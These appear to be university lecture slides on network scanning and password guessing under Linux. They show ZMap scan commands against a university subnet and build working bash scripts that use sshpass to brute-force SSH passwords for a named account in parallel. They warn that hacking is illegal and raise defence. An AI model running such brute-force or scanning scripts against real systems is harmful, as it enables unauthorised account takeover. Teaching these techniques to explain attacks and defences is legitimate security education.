Network Security In Linux:
Scanning and Hacking
Review
• Lex
– A lexical analyzer that tokenizes an input text.
• Yacc
– A parser that parses and acts based on defined grammar rules involving tokens.
• How to compile Lex and Yacc source files into an executable file.
Outline
• A naïve way to hack
– Background
• IP network
• TCP protocols
– Network scanning
Background
• Internet:
– A set of inter-connected networks
– Largely relies on the TCP/IP protocols
• IP : Internet Protocol
– Provides an address for routing information
– Data is segmented into packets.
• TCP : Transmission Control Protocol
– Runs over IP and controls how IP packets are transmitted
– Port numbers: differentiate services.
IP
• Responsible for end-to-end transmission
• Sends data in individual packets
• The maximum packet size is determined by the networks along the path
– Fragmented if too large
• Unreliable
– Packets might be lost, corrupted, duplicated, or delivered out of order
IP address
• IP address: 4 bytes
– e.g. 141.225.9.148 (csa.memphis.edu)
– Each device normally gets one
– In theory there are about 4 billion available
• A subnet: [4 bytes IP]/[0~32]
– Represents a range of IP addresses
– e.g., 141.225.8.1/22
TCP port number
• A port number is an application-specific software construct serving as a communications endpoint in a computer's host operating system.
– 2 Bytes: 0 ~ 65535
– Used to differentiate services.
• Examples:
– 21 – FTP, 22 – SSH, 23 – Telnet
– 80 – HTTP, 443 – HTTPS
How to connect to a machine
• You have an IP address, and you know which service you want
– Surfing the web: send packets to the destination IP with port number 80
– SSH login: send packets to the destination IP with port number 22
– …
Potential Risks
• As long as your machine has an IP address and is connected to the Internet, anyone can try to log in to it.
– FTP login
– SSH login
– Telnet login
– PHP login
– MySQL login
– …
How to SSH log in to a machine
• Steps:
– You need to know that the machine runs an SSH service.
– You need a username and a password.
– Then, connect to the destination IP on port 22.
• Example:
– ssh tom@csa.memphis.edu
– The computer will create a packet consisting of
• The IP of csa.memphis.edu: 141.225.9.148
• The port number of SSH: 22
Check if a machine supports SSH
• Port scanning
– Scan a subnet or the whole Internet to see which machines support SSH login.
• Implementation:
– Send a packet to port 22 of each IP and test whether there is a response.
Scanning Tool in Linux
• ZMap
– A very recent tool, released in 2013.
– https://zmap.io/
• Installation:
– Download the source, compile and install.
• https://github.com/zmap/zmap
– Ubuntu/Mint:
ZMap Feature
• Fast
– can port scan the entire IPv4 address space from just one machine in under 1 hour.
Speed of ZMap vs Nmap
[Table omitted: averages for scanning 1 million random hosts]
Internet wide results by ZMap (I)
• Find vulnerabilities
– UPnP vulnerability disclosed by HD Moore, Jan 29 2013.
– Scan results in Feb:
• 15.7 million publicly accessible UPnP devices
• 3.4 million still vulnerable (~22%)
Internet wide results by ZMap (2)
• Find service availability
– Outages during Hurricane Sandy, Oct-Nov 2012
– More than 30% decrease
Is port scan legal?
• DoS attacks
– Definitely break the law
• Hacking into someone's computer
– Definitely breaks the law
• Port scan
– Gray area?
– Most likely prohibited by your ISP.
Response results to ZMap scan
• 200 Internet-wide scans
• Received requests to exclude 3,753,899 addresses from scanning
– (~0.11% of the IP address space)
ZMap for our use
• zmap -p [port] [IP]/[mask] -i [device] -o [file]
– -p: specify a port number
– -i: can be omitted if you have just one network device
– -o: output all found IPs into a file
• Example:
– zmap -p 22 141.225.8.1/22 -i eth1
– zmap -p 22 141.225.9.1/24 -i eth1
Exercise: do a port scan
• Scan subnet 141.225.8.1/22 with
– port 80.
– port 22.
Mission
• Suppose Tom has an account
– At a remote host: csa.memphis.edu
– Username: tom
– Password: unknown, but consists only of digits.
How to guess a password
• Create a dictionary
– try all passwords in the dictionary one by one
• How to create a dictionary:
– Non-trivial
– Social engineering
• What's the user's name?
• What's the user's birthday?
• What's the user's nickname?
• ….
Guidelines to create a dictionary
• Some common patterns in our passwords
– People tend to write letters first, then numbers
– People tend to write special characters last.
• !, *, @, #, $, %
– People tend to use birthdays, phone numbers, street numbers, zip codes, …
– Some people tend to use only numbers.
– Many people don't like uppercase, or put the uppercase letter first.
– … …
A password with only numbers
• DON'T use a password that contains only numbers!
• Create a dictionary that contains all combinations of numbers.
– Try them one by one.
#dict.txt
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 …
Try password
• We can manually try passwords in the dictionary one by one.
• Or, we can write a shell script to try all passwords.
[Diagram omitted: dict.txt (0 1 2 3 … 22 …) fed into ssh connections to csa.memphis.edu, user tom, port 22]
sshpass
• The ssh command does not support automatic password entry:
– ssh tom@csa.memphis.edu
– You always need to enter the password manually.
• sshpass: supports entering the password on the command line.
– Ubuntu/Mint install: apt-get install sshpass
– Usage:
sshpass example
• sshpass -p "12812" ssh tom@csa.memphis.edu
– If successful, it will log in.
– Otherwise, it will say "Permission denied, please try again".
• Try more:
– sshpass -p "11111" ssh tom@csa.memphis.edu
Write a shell script trypassword
• The arguments of the script are
– First: IP
– Second: username
– Third: password
– Example:
• ./trypassword csa.memphis.edu tom 1
trypassword script
#!/bin/bash
# $1 - ip address to hack
# $2 - username
# $3 - password
sshpass -p "$3" ssh $2@$1 &> /dev/null
if [ $? -eq 0 ]; then
    echo "Find the password: $3"
    exit 0
fi
exit 1
/dev/null is a device file that discards all data written to it
http://en.wikipedia.org/wiki/Null_device
Any issue?
The correct script
#!/bin/bash
# $1 - ip address to hack
# $2 - username
# $3 - password
# Piping "exit" closes the session as soon as the login succeeds,
# so the script does not wait for interactive input
echo "exit" | sshpass -p "$3" ssh $2@$1 &> /dev/null
if [ $? -eq 0 ]; then
    echo "Find the password: $3"
    exit 0
fi
exit 1
Put trypassword in a loop
• trypassword offers one try.
• Our objective
– Try every password in the dictionary
– Put trypassword in a loop.
• Each time, we try one different password
• Until we find the correct password.
runhacking script
#!/bin/bash
ip=csa.memphis.edu
username=tom
dict=dict.txt
for password in `cat $dict`; do
    echo "Try password: $password"
    ./trypassword $ip $username $password
    if [ $? -eq 0 ]; then
        exit 0
    fi
done
Speed up the process
#!/bin/bash
ip=csa.memphis.edu
username=tom
dict=dict.txt
for password in `cat $dict`; do
    echo "Try password: $password"
    ./trypassword $ip $username $password
    if [ $? -eq 0 ]; then
        exit 0
    fi
done
exit 1
It will hang there and wait for the result of each try!
Our current strategy
[Diagram omitted: timeline between hacker and server; each attempt waits for the server's reply before the next one starts]
A better strategy
[Diagram omitted: timeline between hacker and server; attempts are sent without waiting for the previous reply]
The new runhacking script
#!/bin/bash
ip=csa.memphis.edu
username=tom
dict=dict.txt
for password in `cat $dict`; do
    echo "Try password: $password"
    ./trypassword $ip $username $password &
    if [ $? -eq 0 ]; then
        exit 0
    fi
done
exit 1
• & makes the command run in the background (a process is created to run the command)
• $? is always 0.
How to track status
[Diagram omitted: runhacking launching ./trypassword ./trypassword ./trypassword … in parallel]
How can we know that a particular process found the password in the runhacking script?
If find password, create a file
#!/bin/bash
# trypassword script:
# $1 - ip address to hack
# $2 - username
# $3 - password
# $4 - the filename to save the found password
echo "exit" | sshpass -p "$3" ssh $2@$1 &> /dev/null
if [ $? -eq 0 ]; then
    echo "Find the password: $3"
    echo $3 > $4
    exit 0
fi
The final runhacking script
#!/bin/bash
ip=csa.memphis.edu
username=tom
dict=dict.txt
pwfile=password
rm -f $pwfile
for password in `cat $dict`; do
    echo "Try password: $password"
    ./trypassword $ip $username $password $pwfile &
    # If the password file is created, we have found it and exit
    if [ -f $pwfile ]; then
        exit 0
    fi
done
Discussions
• Hacking is ILLEGAL!
– Running this script against someone else's computer is illegal!
• The other computer can log your IP address and trace you back.
– You may try the script on csa.memphis.edu
Summary
• TCP/IP networks
– IP address and TCP port
• ZMap
– Very fast Internet scanner
• A naïve script to try passwords
– Hacking is ILLEGAL!
– How to defend?